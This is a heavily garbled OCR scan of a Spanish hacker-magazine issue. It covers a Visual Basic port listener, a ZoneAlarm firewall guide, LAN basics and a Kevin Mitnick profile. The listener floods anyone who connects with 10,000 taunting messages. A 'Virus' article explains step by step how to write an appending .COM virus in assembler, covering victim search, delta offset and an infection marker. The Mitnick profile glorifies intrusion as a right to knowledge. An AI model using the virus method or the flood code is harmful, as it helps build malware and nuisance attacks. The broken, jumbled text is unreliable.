guridad de los datos entrantes y 
salientes y para optimizar la comu- 
nicación. 


wua.hackerjeurnales.com 19 


= SEGURIDAD ..M 


0 SARA RAPE OEI NT TE NT RRA 


La mejor defensa es el ataque 


» El programa 


Listening - (6) byendsub 


| Poni in ascolto sulla ; [23 


1) cmdescucha Click 


Private Sub cmdescucha Click() 
ws.LocalPort = txtport.Text 

ws Listen 

MsgBox “Servicio de escucha 

En el puerto: ” £ txtport.Text, 
vbInformation 

End Sub 


4$ EREDOBO.MExt/ 


ee 


E? 
2) ws ConnectionRequest 
Private Sub ws ConnectionkRe- 
quest (ByVal requestID As Long) 
If ws.State <> seckClosed Then 
ws .Close 
ws .Accept requestID 
lstlog.AddItem “Conexión de: % 
ws .RemoteHostIP £ “ en el puer- 
to MS iEREPODt. Next 
Horn 1 1= Mimo 0000 
ws. SendData “Quítate de en medio 
lamer, has sido ¡identificado—-> 
1 $ ws.RemoteHostIP £ vbCrLf 
Next 1 
End Sub 


“Conexión de : *ip de el lamah" 
en ¡el puerto || tescrito en el 


Extport*" 


Welcome to Darwin! 
[localhost :-] andreX telnet 192.168.9 23 
Trying 192.168.0.B... 


| Quitate de en medio lamer, has sido identificado 
Quitate de en medio lamer, has sido identificado 
Quitate de en medio lamer, has sido identificado 
Quitate de en medio lamer, has sido identificado 
Quitate de en medio lamer, has sido identificado 
|| Quitate de en medio lamer, has sido identificado 
|| Quitate de en medio lamer, has sido identificado 
Quitate de en medio lamer, has sido identificado 
Quitate de en medio lamer, has sido identificado 
Quitate de en medio lamer, has sido identificado 
Quitate de en medio lamer, has sido identificado 
Quitate de en medio lamer, has sido identificado 
Quitate de en medio lamer, has sido identificado 
Quitate de en medio lamer, has sido identificado 
Quitate de en medio lamer, has sido identificado 
Quitate de en medio lamer, has sido identificado 
Quitate de en medio lamer, has sido identificado 
Quitate de en medio lamer, has sido identificado 
Quitate de en medio lamer, has sido identificado 
Quitate de en medio lamer, has sido identificado 
Quitate de en medio lamer, has sido identificado 


For 1 =.1. To 10000 

ws .SendData “Quítate de en medio 
l lamer, has sido identificado” 
—-> “ £ ws.RemoteHostIP £ 

| vbCrLf 

Next i 


Que indica un envio de diez mil 
series con la orden 


ws .SendData “Quítate de en medio 
lamerone, has sido ¡identifica- 
do” 

—-> “ £ ws.RemoteHostIP £ 
vbCrLf 


Jusr/bin/login (yp1) 


---> 192.168.0.2 
---> 192.168.0.2 
---> 192.168.0.2 
---> 192.168.0.2 
---> 192.168.0.2 
---> 192.168.0.2 
---> 192.168.0.2 
---> 192.168.8.2 
---> 192.168.0.2 
---> 192.168.0.2 
---> 192.168.0.2 
---> 192.168.0.2 
---> 192.168.0.2 
---> 192.168.0.2 
---> 192.168.0.2 
---> 192.168 .0.2 
---> 192.168.0.2 
---> 192.168.0.2 
---> 192.168.8.2 
---> 192.168.0.2 

2 


---> 192.168.8. 


For i = 1 to 10000 


ws.SendData “Quítate de en medio 
lamer, has sido identificado —- 
> “ £ ws.RemoteHostIP £ vbCrLf 


3) cmádesconecta Click 


Private Sub 
cmddesconecta Click() 
ws.Close 

MsgBox “Sesión terminada”, 
vbInformation 

End Sub 


ws.LocalPort = txtport.Text 
ws.Listen 

MsgBox .Servicio en escucha en el puerto: . ér 
txtport. Text, vbinformation 

End Sub 

Private Sub cmddesconecta_Click() 
ws.Closea 

MsgBox .Sesión terminada., 

vbinformation 

End Sub 

Private Sub ws_ConnectionRequest(ByVal 
requestlD As Long) 

Ifws.State <> sckClosed Then ws.Close 
ws.Accept requestlD 

Istlog.Addltem .Conexión de :. € 
ws.RemoteHostlP Er. en el puerto :. ér 
txtport. Text 

Fori = 1 To 10000 

ws.SendData .Quítate de en medio lamer, has sido 
identificado.-> . € ws.RemoteHostlP €r 
vbCrLf 
Next i 
End Sub 


PRACTICA. MB 


CÓMO CONFIGURAR EL FIREWALL GRATUITO ZONE ALARM 


Pc seguro sin 


Hoy en día, navegar por Internet sín un firewall es como dejar el coche abierto con las 


ólo quién ha utilizado 

un firewall al menos 

una vez, sabe cuántos 

son los ataques poten- 

ciales y las inspecciones maliciosas que a 

cada momento bombardean cualquier 
ordenador conectado a Internet. 

Las protecciones convencionales provis- 
tas de un antivirus no son suficientes, ha- 
ce falta un firewall que proteja el ordena- 
dor de las agresiones que pueden venir 
del exterior, y que quizá también verifique 
las conexiones establecidas desde pro- 
gramas ya residentes en el PC, a veces de 
manera inconsciente por parte del usua- 
rio. El firewall ZoneAlarm, producido por 
ZoneLabs (www.zonelabs.com), res- 
ponde a estas características y una de 
ellas a tener muy en consideración: en su 
versión base, es completamente gratis 
para el uso personal. Sin embargo, 
hay sólo una cosa más peligrosa 
que el hecho de no tener un fire- 
wall: tener un firewall mal configu- 
rado. Si los ajustes no se hacen a la per- 
fección, pueden dejar abiertas grietas, 
con el agravante que la posesión del fire- 
wall nos proporciona una falsa sensación 
de seguridad. Veamos pues, cómo confi- 
gurar el ZoneAlarm. 


El primer paso que tenemos 

que hacer es descargar e insta- 

lar el programa del sitio 

www.zonelabs.com (tenéis que 
buscar el botón dónde pone Free Down- 
load). Después de hacer un doble clic y 
de las fases de instalación, hay que reini- 
ciar el Pc. Aparecerá una presentación de 
las funciones del firewall que conviene le- 
er si sabéis inglés. 


El programa, una vez reinicia- 

do, automáticamente está pre- 

parado. Aparecerá un icono en 

la barra de las aplicaciones de 
Windows, al lado del reloj. Desde este 
icono se puede abrir la ventana de confi- 
guración o tener notificaciones de las 
alarmas que pueden dispararse durante 
la navegación. 


Para un solo ordenador se 

puede evitar hacer configura- 

ciones iniciales. El programa 

ya está preparado para un uso 

normal y bloqueará todo el trá- 
fico sospechoso que llega al Pc. 


Cada vez que un programa 
ejecutado en el ordenador lo- 
cal intente conectarse a Inter- 
net, ZoneAlarm nos pedirá que 
demos una confirmación para la cone- 
xión. De este modo, se autorizaran sólo 
los programas que se desea realmente 
utilizar, bloqueando el tráfico originado 


Adware o Spyware: Programas que 
envían informaciones sobre nuestras 
preferencias de navegación a Un servi- 
dor central y las utilizan para enviar ban- 
ner publicitarios escogidos. Son un po- 


tencial peligro para la privacidad. 


'd) REPEAT PROGRAM 


Do you want to allow RealPlayer to access the 
Intemet? 


Technical Information 


Destination IP: 213.140.2.12:DNS 
Filename: REALPLAY.EXE 
Version: 6.0.9.584 


More Information Available 
This program has 


previously accessed the Pm. 
Intemet, 


More Info ES 


Remember this answer the next time | use this 
program. 


por programas AdWare o Spyware, o por 
los caballos de Troya o otros programas 
que envían informaciones al productor 
para notificar actualizaciones y quién sa- 
be porqué otros objetivos. 


Desde el icono en la barra de 
aplicaciones aparecerá un avi- 
so, en forma de nube, con el 
nombre de la aplicación que 
intenta establecer la conexión, y la direc- 
ción Internet que está buscando. 
Para autorizar la conexión es suficiente 
con hacer clic en el botón Yes , mientras 
que para bloquearla basta que aprete- 
mos No. Haciendo clic en “Remember 
this answer the next time | use this pro- 
gram”, ZoneAlarm se acordará de nues- 
tra elección y evitará preguntarnos la 
elección cuando la misma aplicación 
vuelva a tratar de conectarse a Internet. 
De todos modos, esta elección puede ser 
modificada en cualquier momento. 


Para un uso normal, no hay 

necesidad de hacer nada más, 

pero ZoneAlarm tiene muchas 

más posibilidades en términos 
de flexibilidad y configuración. Haciendo 
un doble clic en el icono de la barra de 
las aplicaciones, se abre la ventana del 
programa, que permite ajustar cada de- 
talle del firewall. 


Haciendo clic en el botón de 
Security se pueden ajustar las 
configuraciones de seguri- 
dad adaptadas a tres niveles 
distintos de protección (Low, Medium y 
High), descritos en la tabla “Los nive- 
les de ZoneAlarm”. Como se puede ver 
, los niveles de protección pueden ajus- 
tarse en dos áreas distintas: en la zona 
Local y en la zona Internet. ZoneAlarm 
permite efectivamente distinguir una 
zona para la red local y una para In- 
ternet (que probablemente tendrá ajus- 


» Y 


a 


eL 


gastarte ni un Euro 


llaves en el contacto. He aquí como poner al menos un candado al propio PC. 


tes de seguridad más rigurosos). 


Para poder distinguir la zona 

local del resto de Internet, Zo- 

neAlarm necesitará de algunas 

informaciones. El firewall es ca- 
paz de reconocer los ordenadores segu- 
ros de algunos parámetros. El modo más 
simple es indicar las direcciones IP de to- 
dos los ordenadores de la red local, ha- 
ciendo clic en Advanced (en el panel Se- 
curity), y después en el botón Add -> 
Hot/Site y introduciendo una descripción 
del ordenador y el número IP (es, 
192.168.0.34). El ordenador que acaba- 
mos de insertar aparecerá en la lista 
Other Computers; para inhabilitar tem- 
poralmente el tráfico de ese ordenador 
será suficiente con deseleccionar la casilla 
en rojo a la izquierda del nombre. 


Add IP Range 


Description [Acministration 


From a Y) f 2 


To CAP! A 0 E. 


Cancel_| 


Si los ordenadores que perte- 
necen a la red local son mu- 
chos, no conviene introducir- 
los uno a uno, 
Lo mejor es reagrupar su número IP en un 
intervalo preciso (por ejemplo desde 
192.168.0,2 a 192.168,0,10), e introdu- 
cir esto en la mask que aparece seleccio- 
nando IP Range después de haber apre- 
tado el botón Add. 


Description | 
IP Address laz 1. TEN. 0 , 1 
e - - 0 


a 


Subnet Mask 


Es evidente que lo dicho en 
los puntos 8 y 9 puede fun- 
cionar solamente si los or- 
denadores de la red local 
tienen un número IP fijo, y no dinámico. 
Por ejemplo funciona si se utiliza la divi- 
sión de la conexión Internet y Windows 
98SE/Me/Xp, que atribuye a cada uno un 
número fijo. Pero si, por el contrario, es- 
tán conectados a un router con atribut- 
ción dinámica de las direcciones IP 
(DHCP), se podrá utilizar la subred mask 
establecida en el router (192.168.0.* o 
1013.53 
Para hacerlo, hay que seleccionar Subnet 
después de haber heacho clic en el botón 
Add, introducir la descripción, el número 
IP y la subred mask correspondiente (si 
estáis en una empresa y no conocéis estos 
parámetros, pedid ayuda al administra- 
dor, e recordadle que tiene que pagar la 
autorización: ZoneAlarm es gratis solo 
para el uso personal, fuera de las empre- 
sas). 


IZ[ÚN E 


GOMFIGUAE 


La 


Elomora Hotine Server 


7.01.00.3055 Irkermet 
(23) OuickTime Plaver Application Losa 
Busch Tina 5.01. Irene 


Loss 
6.0.9.694 Intena 
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po 
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a 
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215 Maika Player 4 
2 


d+ 
B407.1119 Jrkemat 
Etick hare lo gunda lo Zonedlam Pin, 


Las posibilidades de configu- 
ración de ZoneAlarm no aca- 
ban aquí. 

Haciendo clic en el botón de 
Programas, se puede ver una lista de to- 
das las aplicaciones que han probado, al 
menos una vez, de acceder a Internet 
después de la instalación de ZoneAlarm, 
con los ajustes de seguridad relativa. La 
primera columna (Aleow Connect) indica 
si el programa tiene la posibilidad de co- 


nectarse a Internet: un signo de selección 
verde significa que ZoneAlarm lo dejará 
pasar, una X roja que el programa será 
bloqueado, y un punto de interrogación 
quiere decir que el firewall nos pregunta- 
rá en cada caso como debe comportarse, 
a través de la ventana de diálogo en for- 
ma de nube que hemos visto antes. La se- 
gunda columna (Pass Lock) si selecciona- 
da permite funcionar al programa, si bien 
se habilita el bloqueo automático (Auto- 
matic Lock). 

Todos estos ajustes son modificables ha- 
ciendo clic en el botón de la derecha del 
mouse en el programa deseado, y selec- 
cionando la opción que queremos del 
menú. lá 


LOS NIVELES DEL ZONEALARM 


Funcionamiento de los niveles 
de protección de ZoneAlarm: 


Utiliza sólo las ventajas de las 
aplicaciones y el bloqueo Internet 
(Internet lock), que en este caso, 
sólo detiene el tráfico de las 
aplicaciones; permite el acceso a 
los servicios compartidos de 
ficheros e impresoras y deja el 
ordenador y las aplicaciones del 
servidor visibles en la red. 


Además de las seguridades que 
ofrece el nivel low, el bloqueo de 
Internet, en este caso, para todo el 
tráfico. Aconsejado para una 
conexión a nivel local. 


Ofrece las seguridades del 
MEDIUM, y además, bloquea el 
acceso a los compartimentos de 
ficheros e impresoras y hace, al 
ordenador, invisible en la red. 


VIRUS 


CUANDO EL ORDENADOR ENFERMA 


Introducción al Dirus 


3 alguien 
a Intentar ex- 
JOS asesinos 


> un:par de le palabras 
plicar que son estos tan. 
de PC. 


saremo dañoso, aunq 


s ordena- | 


una distinción entre las 
menudo se le llama 


ROS 
lente, cuando se crea UN' 
ntenta dar vida a un pre 


Estas son algunas de las “infecciones vir 
tuales” conocidas y se necesitarían muchas 
páginas para: explicar en detalle como fun- 
cionan. 

Por una vez nos limitaremos a tratar solo 
los más simples, como los appending y da- 
remos algunas pinceladasisobre el poli- 


mo y la criptografía. 


a. coa ci 


trol, se a en otros 

s y al final devuelven el control al pro- 
grama infectado, haciendo que todo pa- 
a normal. Los parásitos de este tipo tie- 


| tar que está infectado. Los al 
viden en dos subcategoría 


hechos para de archivos 
e 


[| cutables e. mu 
y, dada su estructura, 
OM resulta mucho 


La primera elección que hay que hacer 
para construir un aáirus es en qué lenguaje 


tiva válida sobre todo para los virus estu- 
diados para windows, l'assembler continua 
siendo la mejor solución. 

Empecemos a ver que tiene que hacer un 
archivo para infectar a otro sin estropearlo: 
El virus ejecutado tiene que encontrar un ar- 
chivo *.com (por el momento nos limitare- 
mos solo a éstos), controlar de algún modo 
que no lo haya infectado anteriormente, 
modificar el archivo tal y como veremos 


más adelante y, finalmente, dejar la fecha |. 


de la ultima modificación y los atributos del 
archivo como los había encontrado para 
evitar or alguna huella. 

Hasta aquí las cosas son bastante sim- 
ples, el problema para los principiantes es- 
tá en entender como conseguir quitar el 

htrol al archivo ejecutado y dárselo al vi- 
s que, tal y como vamos a explicar más 
lelante,. 


. La solución nos la da 
código máquina JMP que, escrita al ini- 
| archivo, hace saltar la ejecución al 
dónde, prec , se encuentra el 


se copiará a sí 
) al ama ¡ continuará 
mn las operaciones citadas arriba, que so 
errar el programa, sl los atributos co- 
[mo estaban ¡ ejecutar el 


Una cosa que a menudo muchos no tie- 
nen en cuenta es que si se utilizan variables 
en el virus, éstas cambian su valor de offset 
cuando el virus se pega al final de un ar- 
chivo, por lo que a menudo resulta imposi- 
ble volver a las variables iniciales y ya no se 
pueden utilizar. Para encontrar siempre el 
valor de offset efectivo de las variables se 
las puede llamar añadiendo a su viejo va- 


lor de offset (el que está marcado por el 


compilador) el que le ha sido añadido en- 


lazándolo al final de otro archivo. Para ob»| 


[Our longlime GA RISK AVERSI 
decided to resign. 
l ole in this company * for many 


sacar del registro BP (que se utiliza 
| poco) el offset del procedimie 
| Todo esto es posible porqué cual 
mos con una CALL el offset d 
miento se pone sobre el stach, 
con ¿Aste pun- 
to las referencias de las variables se harán 
llamando [BP+OFFSET variable]. Todo esto 
es fundamental para evitar perder referen=! 
cias de las variables, al contrario no sirve |” 
para modificar las instrucciones que utiliza 
un offset relativo como las JMP o CALL o 
varios saltos condicionados. 
Una vez encontrada la variación de offset 
del programa es necesario empezar a bus- 
car archivos para infectar. Ya que por aho- 


E | ra tratamos solo. sobre los archivos*,COM 


la búsqueda se limitará a este tipo de ar- 
tivos. 
Para E un archivo se recurre a lla- 


IND: FIRST e FIN 


| chivo enco 


a el string en AS- De 
1r (el formato ASCIIZ. 
co: y después | 


La búsquil ¡ solo el primer 
E adecuado. 


unc ión 4Fh: 


tará. llamar la"FIND' NE; 


CUANDO EL ORDENADOR ENFERMA 


INT 21h)"€ón los mismos parámetros (CX| | en nuestro caso es la letra R INICIO: eti- 
atributos, DS:DX archivo a buscar) para en- queta en la: ue propiamente «e el vi- 
contrar el siguiente archivo, hasta que no rus, ' 
encontremos la víctima adecuada. Hasta 
aquí tendría que ser todo simple, pero 
FIND FIRST y FIND NEXT ¿dónde nos de- 
vuelven los archivos? Bueno, en el DTA que 
es una parte del PSP situada a 80h, Ahora 

un virus no puede utilizar el DT; me 


psi ES Jue no, oro gedró a la in- 


e 


do ls | na $3 ave 
22 DIT US. YU Els 


seados, por lo que es importa 
un nuevo DITA y trabajar sobre éste. Basta- 
rá preparar una variable DTA de 42 byte 


ar ón parásito informático. Aunque, € 
hay que intentar infectar lo encontraremos mos dicho, escribir virus Ye 
en la variable DTA en la posición Jel : 
¿lo que llamaremos la variab 
BP+OFFSET DTA+1Eh]. En el DT, 
cuentra solo el nombre del « 
¿que hay también sus atributos 
nora de la última modificación y 
siones, en el orden siguiente . 
quisiéramos, para lee Iquier. de estos 
atributos bastaría aña: la dirección de 


In con o que. os apar pelear 
> días... 


(En los próximos artículos continuaremos 

tratando los virus entrando 

“específicamente en algunos aspectos y. 
analizando los diversos tipos de infección); 


ALOE: Sl 0K 


able CTA la posición del dato que nos 
esara. Una vez encontrado un archivo 
"es Indispensable asegurarse que entre en 
nuestros criterios de infección. Si el archivo 
ya ha sido infectado sería oportuno evitar 
volver a hacerlo. Uno de los métodos más 
comunes para controlar si el archivo ya ha 
sido infectado es poner un marcador de in- 
fección en los primeros bytes del programa 
(y del virus) justo después de la instrucción 
de jump. Elirus deberá, una. vez encontra- 
da una posible victima, controlar si en una 
MeterminanA Mipición está «coctel 


a 


tectad Ms es virus, como 
Brimeras “instrucciones MM endremios; JUMP 2 
INICIO ¡salto simple. DB 1 marcador que 
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PRACTICA, . 1 


4 ve A His e yá qe 4 ve bt 


Hacer que se pongan de acuerdo varias personas puede ser extremadamente 
complicado, tratar de que convivan unos cuantos ordenadores, aún lo es más, 


sobretodo si no se siguen las reglas básicas en la construcción de una LAN, 


> es el acróni- 

ESA mo de Lo- 
| 66 LAN E cal Area 

n Network, 

| es decir, 


una network 
Moca: una red de 2 o más ordenadores 
| que comparten recursos como ficheros, 
| disquetes, impresoras, etc. 
¡Tener distintas posiciones de trabajo in- 
lterconectadas entre ellas es sin duda 
| muy práctico, y, de hecho, en muchos 
_|casos, en los que es necesario propor- 
icionar a los usuarios la posibilidad de 
| compartir entre ellos datos y ordenado- 
lres, se hace casi imprescindible: sólo 
¡hay que pensar en el caso más típico, el 
de una oficina que utilice ordenadores, 
lo en todos aquellos contextos en el que 
los ordenadores tienen, para los usua- 
rios, una función de consulta (hospita- 
“les, ferias, museos, etc.) Pero si quere- 
| mos acercarnos un poco más a la cues- 
|tión, podemos empezar haciéndonos las 
típicas preguntas: ¿cómo funciona? ¿Co- 
| mo está organizada? ¿Porqué es impor- 
"| tante conocer las redes locales desde la 
sl óptica de la seguridad informática? 


A 
asionadamente 


2 hemos dicho, una LAN no es 
¿que un conjunto de ordena- 
ectados entre ellos y que 
cambiar datos de distintos 
pezar daremos un vistazo 


llos días, otros se 
| de proporcionar 


á 


«otros, tienen la difícil tarea J 


de todos los recursos preser 
cuando éstos la vuelven a p 


a todas las posiciones prese 
red de salir de internet. Una 
que hay que tener en cuenta: 
no son siempre homog 
decir, basadas en un único sist 
rativo. En muchos casos se hace nece- 
sario conectar entre sí ordenadores que 
están montados en distintos,SO: una 
caso típico es el de muchos 


de una utilización correcta d 
nados software, como por. 


m 
'nadores utilizado 
|rrientes como posicion: 


[madas workstations. Ésta 


puede ser una operacion. 

muy compleja, 

especialmente si hay 
muchas unidades 
conectadas. | 


piden al usuariosuna au 
muy importante el conc 
“User”. Por motivos obvios, Ol 
vos y de seguridad, es necesario ¡ | 
ficar a los usuarios que están utilizando: 
un ordenador de la LAN, para poder es- 
tablecer reglas para preservar la integri- 
dad de las redes mismas y garantizar el 
correcto funcionamento del sistema in-' 
cluso en el caso que uno de los usuarios 
arme un poco de jaleo. 

Por esta razón existen distintas clasifica- 
ciones estándar de los usuarios: un 
usuario corriente, por ejemplo, tiene ac- | 
ceso a determinados recursos y puede 
utilizar determinados programas y llevar 
a cabo determinadas operaciones. 

Un administrador, en cambio, tiene más 
poderes y la capacidad de instalar apli- 
caciones, eliminar ficheros, mover.bases 
de datos, además de intervenir en las 
“leyes” que gobiernan a los usuarios. 
Los distintos tipos de utilización de la 
N pueden ser de los más variado: a 
es es necesario delegar, a un grupo 


|. 
Laser Printer 


Custom 
Equipment 


les -más bien políticas o policies. 


>> El cliente, 
este desconocido 


Hecha una ojeada a los 
usuarios, pasemos a los 
ordenadores: además de 
OS ] abituales, te- 


chas tareas importantes: 
ses de datos relativas a los 


Otro detalle importante: el PDC puede 
tener incluso la función de NetLogon 
Server, proveer a todos los clientes los 
script y procedimientos de inicio que son 
enviados cada vez que alguien efectúa 
un logon en la red. El PDC se apoya, 
con frecuencia (sobretodo en redes lige- 
ramente más voluminos aquellas 
constituidas por tres o cuatro ordenado- 


res) en un Backup Domain Controller: un. 
ordenador que contiene todas las infor- 


maciones amontonadas en el PDC y 


que, por tanto, en caso que se produzca 


cualquier problema en este último, pue- 
de sustituirlo y permitir que la LAN pue- 
da continuar operando correctamente. 


- rección 
nosotros,comunes seres mortales, acor- 


muy importante el concepto de grupo de 
usuarios: una agrupación de usuarios a 
los cuales se les asignan reglas genera- 


En una sola red, naturalmente, los orde- 
nadores están identificados por una di- 
IP Siendo difícil para 


darnos de memoria de una serie de 4 
meros variables en un intervalo de O 
256, tenemos aquí un servicio de re- 


"solución de los nombres: WINS, o Win- 


dows Internet Name Service. En una red 
local hay, de costumbre, un ordenador 
que lleva a cabo esta tarea (puede ser 
el PDC, en redes de pequeñas dimen- 
siones): éste contiene una base de datos 
“nombre ordenador — IP correspondien- 
te- servicios realizados” que, efectiva- 
mente, nos proporciona un mapa de to- 
dos los recursos disponibles en la LAN. 


>> Made in Windows 
2000 


Está bien tener presente 
que en las redes basa- 
das en Windows 2000 
muchas de estas “reglas” 
han cambiado: se ha per- 
dido la distinción entre 
PDC y BDC, en tanto que 
en una red puede haber 
distintas PDC que traba- 
jen a un mismo tiempo, y 
el servicio WINS ha sido 
sustituido por un DNS 
normal (Domain Name Service, utilizado 


frecuentemente:en Internet). Todas estas 


mejoras, sin embargo, no garantizan la 


- compatibilidad absoluta en una red ges- 


tfionada por ordenadores Windows NT 4 


[conjuntamente a otras Windows 2000, y 


en olgunos casos (a pesar de que Mi- 
crosoft, oficialmente, lo desaconseje) es 
necesario, por ejemplo, tener un servi- 
dor WINS para garantizar el correcto 
de amiento de la LAN mediante or- 
denadores NT 4. Lo dicho hasta aquí re- 
presenta sólo un barniz de algunos ele- 
mentos esenciales de una red basada 
en Windows: existen muchos y muy va- 
riados servicios que también se pueden 
implementar en una LAN (sin mencionar 


ni tan siquiera el tema de la Active Di- 


rectory), y es que, la documentación so- 
bre la infraestructura de red en Win- 
dows es ciertamente mastodóntica. De- 
emos pues, WINS, PDC y compañía y 


- demos un vistazo a cómo las distintas 
posiciones se identifican entre ellas: ya 


hemos apuntado a la utilización de di- 
recciones IP como podemos ver en la 


sección de al lado. ca 


Lo E 


A TO FE 
A IA 


En una LAN es 
necesario de- 
finir lo que 
nos llega con 
el nombre de 
“IP MASK”, oO 
una clase de 
IP que reúna 
todas las posiciones de tra- 
bajo: en redes Windows es 
típica la 192.168.x.x (para 
redes de grandes dimensio- 
nes), Oo la 192.168.159.x (pa- 
ra redes de menor alcance). 
Se pone en marcha esta mask 
de las direcciones, por ejem- 
plo, para subdividir dos dis- 
tintas redes: en una planta 
de un edificio que alberga 
las oficinas de una empresa, 
por ejemplo, se utilizará 
192.168.1.x, y a cada cliente 


individual se le asignaran ip 
tales como 192.168.1.1, 
192.168:1:3% 
etc. 

En la planta superior del 
mismo edificio podría haber 
otra red que no estuviera di- 


192.168.1.2, 


rectamente comunicada con la 
precedente y que tuviera una 
subnet mask del tipo 
192.168.2.x. 

Cuando las posiciones de una 
de estas redes acceden a In- 
ternet no lo hacen mediante 
el mismo ip local, sino ex- 
plotando otro ordenador que 
funciona de gateway, propor- 
cionándoles acceso a la web, 
pero con un IP de su clase 
que será el utilizado 

desde todos 

los ordenadores de la subred 
para salir de Internet. 


= MITO Y LEYENDA..M 


EL MÁS GRANDE HACKER DE TODOS 


ANTIHACKER 
MN Si Mitnick es el hacker 
MN más famoso del mundo 
seguramente no ha sido el prime- 
LO 
En este sentido se señala un tal 
John Draper que alrededor de los 
años sesenta había encontrado el 
modo de utilizar el 


IN telerono “gratis! usando un silba- 
Í to que contenían las patatas 


“Captain Crunch”. 
Esto emitía una señal acústica 
con una cierta frecuencia que, 
al momento de la llamada parali- 
Y zaba la central permitiendo a 
Draper, llamado después por todos 
Capitan Crunch, el telefonear 

gratis a cualquier lugar 
Ñ del mundo. 


RESEÑA PUBLICADA 


Si están interesados en 

tener un panorama más exhaustivo 
Ñ de todos los artículos 
MÍ que hablan sobre Mitnick basta 
y acceder a la siguiente 
dirección: 

http: //hpgx.net/willday/mit- 

nick.html, spartano pero 


SHIMOMURA 
LA DISFRUTA 
“El amado” Sr. Shimomura 
f mientras tanto ha embolsado 


por el libro que ha escrito “Tras 
MN las pistas de Kevin” (Edición 
A Sperling € Kupfler) 


LOS TIEMPOS 


Detenido alrededor de 4 
años, Kevin Mitnick sigue 
dando de que hablar. 

Ha sido el hacker más genial 
del mundo, y probablemente 
losea todavía, pero es sin 
dudas elmas famoso. Para 
muchos, un paladín de la 
internet libre, para otros, un 


peligroso criminal. 


a or mucho tiempo Mitnick «ha 
| | ¿permanecido fugitivo. Para atra- 
| parlo, fueron necesarios dos años ' 
= | llenos de investigaciones por par- | 
te del FBI y meses y meses de mo- 
'nitoreo continuo de Minneapolis a Washing- 
ton, hasta Denver y Colorado. 
| “Inicia su “carrera” mientras frecuenta la 
| Monroe High School de Los Angeles donde | 
| | se arriesga a acceder al banco central de da- | 
los del distrito escolar; sólo dos años mas tar- | 
de se supera, eludiendo los códigos de acce- 
¡so de los ordenadores del departamento de 
| defensa americano. 
A continuación de esta proeza pasa los su- 
| cesivos seis meses bajo el sol de California, o 
para decirlo mejor a la sombra, en una pri- 
¡sión de máxima seguridad para jóvenes.A fi- 
nales de 1983 queda libre y listo para reini- 
| ciar sus actividades. 


¡En este periodo conoce a Bonnie Vitello, una 
| mujer seis años mayor, de tupida melena 
| castaña y de físico delgado. Un personaje un 


poco anónimo que habría de transformarse 


len su esposa! Bonnie trabaja como gerente 
¡en GTE, la compañía telefónica de Los Ange- 
les, y es este rol lo que despierta la fantasía 
de Mitnick. En realidad, Mitnick entiende rá- 


informáticas del país, con el fin de captar to-' 
| da aquella información que debía ser, según: 
¡Mitnick, patrimonio de todos en nombre de| 


pidamente que Bonnie podría ser verdade- 


¡ramente fundamental para acceder a los 


grandes bancos de datos de las compañías 


una visión utópica de internet libre. | 

Información que en cambio viene siendo! 
guardada en secreto y custodiada celosa-: 
mente, algo propio de las compañías de soft- 


|ware. Para Mitnick todo esto es intolerable. El 
¡teoría según la cual el interés de Mitnick en 
¡Bonnie no fuera determinado por propio 


amor sino por motivos de oportunidad es 


lafirmada por un amigo del mismo, el cual di- | 
| ce sin dejar lugar a duda: “A Kevin no le han 
l atraído particularmente las mujeres, creo qUe 


tiene por el sexo opuesto el mismo ES 
que por un silicon chip" 

Gracias al acceso privilegiado a las redes: 
telefónicas garantizado por Bonnie nuestro | 
pirata intenta el gran golpe: se introduce en 
el sistema de la Digital Equipment Corpora-' 
tion en Palo Alto y copia algunos programas 
para ordenador absolutamente secretos. El 


Icóndor se siente atraído por el VAX/VMS un 


sistema operativo propiedad de Digital, prác- 
ticamente inaccesible, desprovisto de bug, 
Único en su género. Mitnick quiere arrebatar 
los secretos del VAX/VMS. Aunque en este ca- 
so, como siempre, cambia su nombre de ac- 
ceso telefónico a James Bond y modifica los 
últimos tres números de referencia digital a 
007: una verdadera finura! Naturalmente es- 


te golpe no pasa desapercibido y el FBI se 
lanza sobre sus huellas, 
Mitnick sorprendido en una tarde de di- 


ciembre por los agentes del FBI mientras se . rápidamente, la alarma en la SC de San Die- 


está en la oficina de Bonnie realizando una 
incursión informática. Se lo acusa de daño a 
los sistemas informáticos de la compañía por 
un monto de cinco millones de dólares!!! | 


sión de alta seguridad al sur de Califomia: Y, |. 
a continuación, en el Beit T'Sluvah Center, | 


para personas con graves problemas men-' p 


al 


tales. 
Después de este período de “cura” Mitnick 
reemprende “el trabajo”. Utilizando Social 
Engineering, una técnica de hacking más so- 
fisticada, vuelve a la carga para buscar de 
arrebatar los secretos de las ¿grandes com! 
pañías informáticas. La suya es Una necesi. 
dad de conocimiento, todas las informacio- | 
nes que adquiere no son utilizadas con mo- 
tivos criminales, ni son revendidos para pro- 
curarse un beneficio económico. 
No, el Cóndor sólo mueve > sus alas por a! $ 
derecho al conocimiento, viola los bancos de 


datos sólo para aprender, pero sobretodo | e 


por su aspiración, que en cuanto alimentado 
de nobles motivos, es ya de por sí un reto, 
para el gobierno americano. Cuando la 
atención en sus actividades 5 pl a ser 
insistente, Mitnick desaparece nus evamente | 
de circulación haciendo perder su pista. 41 


n diciembre de 1994, el mismo si 
/ y) 


a, 
E 
$ 


viEdad, los destinos de Mitnick y fabio 
se cruzan: comienza así la gran cacería. 


¿En los hechos, como reporta el New York Ti“ | 


mes, Shimomura se está yendo a San Fran-' 


cisco cuando Mitnick “viola” el sistema de se= y) 199 


ts 
Solo 03 se 
| pudo considerar realmente libre, codi 


guridad de su ordenador,en su casa.de San. 
Diego. El mensaje que deja en la pantalla de 
su ordenadores digno de una película de ac- 


Er 


ción: “Find me, | am on the net”, “Encuén=' > 


trame, estoy en la red”. Pero está claro que. 
es aquí donde Mitnick comete su primer gran 
error. De hecho, en el momento en que Mit- 
nick viola el sistema de seguridad del orde- 
nador de Shimomura ocurre algo funda- 
mental, El ordenador del experto en seguri- 
dad está programado para transmitir una 
serie de copias de archivo de rutina en otra 


iS 


je mente de y Mitnick sólo qu 
Después de esta sentencia termina por pasar 

ver se 
los sucesivos 22 meses en Lompoc, una. pri 


otra compañía en la.mira de 


Pa 


paño de la red:informática en su ausencia, y | 

| precisamente al San Diego Supercomputer| ñ NE 
Center, L La intervención de Mitnick hace sonar | 5 5] 
EL SITIO 
OFICIAL 
Todo lo relacionado a 
Kevin Mitnick 

se encuentra en fl 
su sitio oficial 


NS e «Shimomura' es llamado. urgentemente | 
«Ide sus vacaciones de ski y para, intentar re- | 
vir > ataque a su “ordenador. Natural-' 
1 pocas pistas | 
2ya que, para este: pu ha utilizado una| 
[nueva técnica denominada IP-spoofing difícil- 
